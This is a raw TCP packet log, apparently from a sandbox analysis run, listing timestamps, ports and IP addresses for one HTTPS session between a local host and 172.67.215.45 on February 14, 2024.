Feb 14, 2024 09:08:18.383383036 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.383413076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.383435011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384352922 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384392023 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384421110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384428978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384459019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384478092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384582043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384618998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384645939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384651899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384696007 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384718895 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384756088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384797096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384826899 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384831905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.384860992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.384882927 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.385314941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.385355949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.385386944 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.385392904 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.385422945 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.385452986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387626886 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387666941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387712955 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387722969 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387764931 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387794018 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387803078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387841940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387871027 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387875080 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387916088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387945890 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.387952089 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.387974024 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.388015032 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.388016939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.388056040 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.388061047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.388101101 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.388142109 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.388165951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.388201952 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.388231039 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.388235092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.388278961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.389270067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.389308929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.389348030 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.389355898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.389378071 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.389406919 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.389626026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.389662027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.389694929 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.389699936 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.389739990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.389770985 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.390223026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.390263081 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.390294075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.390299082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.390348911 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.390369892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.390568972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.390609026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.390640974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.390645981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.390686989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.390717983 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.391807079 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.391845942 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.391874075 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.391881943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.391911983 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.391937971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392153978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392190933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392220020 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392225027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392271996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392292976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392293930 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392314911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392349005 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392358065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392383099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392388105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.392417908 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.392452002 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.393075943 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.393115997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.393145084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.393151045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.393193007 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.393218040 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394490957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394531012 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394556046 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394567966 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394603968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394623041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394668102 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394707918 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394790888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394798040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394839048 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394850969 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394889116 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394910097 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394913912 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.394970894 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.394970894 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.395905018 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.395942926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.395973921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.395982027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.396023989 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.396048069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.396970987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397011042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397052050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397059917 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397106886 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397208929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397250891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397283077 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397286892 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397315025 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397346973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397394896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397433996 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397459984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397464037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.397505999 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.397533894 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.398300886 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.398339987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.398379087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.398386002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.398432016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.399873018 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.399909973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.399943113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.399950981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.399976015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400007010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400085926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400124073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400156021 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400160074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400199890 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400228977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400393963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400430918 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400463104 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400469065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400509119 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400538921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400695086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400732994 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400762081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400767088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.400806904 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.400837898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.401977062 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402014971 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402055025 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402062893 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402096987 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402117968 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402143955 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402185917 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402203083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402208090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402245998 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402797937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402838945 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402861118 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402867079 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.402899981 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402923107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.402985096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.403023958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.403062105 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.403068066 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.403101921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.403124094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.404367924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.404406071 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.404433012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.404448032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.404479980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.404500008 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.404591084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.404629946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.404660940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.404665947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.404707909 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.405352116 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.405390978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.405430079 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.405441999 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.405464888 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.405497074 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.405586004 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.405630112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.405657053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.405663013 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.405689955 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.405716896 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.406917095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.406956911 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.407002926 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.407018900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.407047033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.407068014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.407072067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.407092094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.407130957 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.407135963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.407155991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.407188892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.407227993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.408077002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.408114910 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.408149958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.408165932 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.408195019 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.408216000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.408271074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.408309937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.408339024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.408343077 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.408381939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.408395052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409580946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.409621954 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.409655094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409672976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.409687996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409704924 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409791946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.409827948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.409852982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409859896 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.409894943 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409909010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.409986973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.410024881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.410047054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.410052061 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.410084009 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.410103083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.410849094 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.410888910 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.410922050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.410929918 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.410954952 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.410978079 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.412178993 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.412220955 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.412250996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.412261009 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.412287951 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.412303925 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.412497044 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.412533998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.412559986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.412565947 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.412601948 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.412621975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.413219929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.413256884 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.413289070 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.413295031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.413324118 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.413343906 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.413410902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.413450956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.413486958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.413491011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.413589001 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.415030956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415071011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415108919 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.415117979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415144920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.415158987 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.415241957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415280104 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415307045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.415312052 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415342093 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.415954113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.415994883 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.416027069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.416034937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.416053057 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.416085958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.416100979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.416138887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.416160107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.416165113 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.416201115 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417498112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417537928 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417587996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417596102 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417627096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417659044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417731047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417768002 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417802095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417808056 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417843103 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417872906 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417922974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417962074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.417989969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.417994022 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.418035984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.418066025 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.418167114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.418206930 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.418241978 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.418246984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.418287992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.418317080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.419477940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419516087 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419552088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.419567108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419598103 CET	49712	443	192.168.2.5	172.67.215.45
